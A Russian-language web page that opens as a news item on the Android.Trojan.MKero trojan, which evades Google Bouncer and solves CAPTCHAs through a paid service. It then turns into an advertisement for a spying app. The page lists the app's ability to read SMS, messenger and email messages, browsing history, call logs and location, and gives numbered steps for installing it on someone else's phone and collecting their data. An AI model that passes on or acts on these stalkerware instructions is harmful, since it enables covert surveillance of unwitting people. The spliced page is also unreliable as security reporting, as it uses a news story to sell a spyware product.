Необычный CAPTCHA-троян появился на смартфонах

43e8a8fede8281fe06ec6bc6974ee8cb

Разнообразие вредоносного ПО поражает воображение. Специалист по безопасности из компании Bitdefender опубликовал свежий отчёт, в котором интерес вызывает троянская программа, способная обходить ввод CAPTCHA-символов. Отличительная особенность в том, что подобный софт эффективно маскируется в игры и обычные приложения. В результате его можно скачать из Play Market. Корпорация Google пока не научилась вычислять и блокировать их!

Троян получил название Android.Trojan.MKero. Впервые его следы были обнаружены в 2014 году, когда программу обнаруживали в Интернет магазинах и на сайтах Восточной Европы. Это первый случай, когда удалось обойти аттестацию Google Bouncer. Официальные представители Google заявили, что будут усовершенствовать алгоритмы работы. Заражённые приложения устанавливались сотни тысяч раз, а ориентировочный ущерб от деятельности трояна составил 250 тысяч долларов минимум.

Троян обходит систему аутентификации, поскольку перенаправляет ввод капчи на сервис Antigate.com. Там за символическую плату происходит автоматический набор нужных символов. Учитывая поле деятельности вредоносного ПО, автору сервис не стоил почти ничего. Использовались структуры C&C, а конечные команды передавались на смартфон посредством SMS-сообщения. Признаком заражённости приложения могут служить уведомления о новых правах, которые требуются программе. Например, редактирование SMS и MMS, Root-доступ и т.п.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.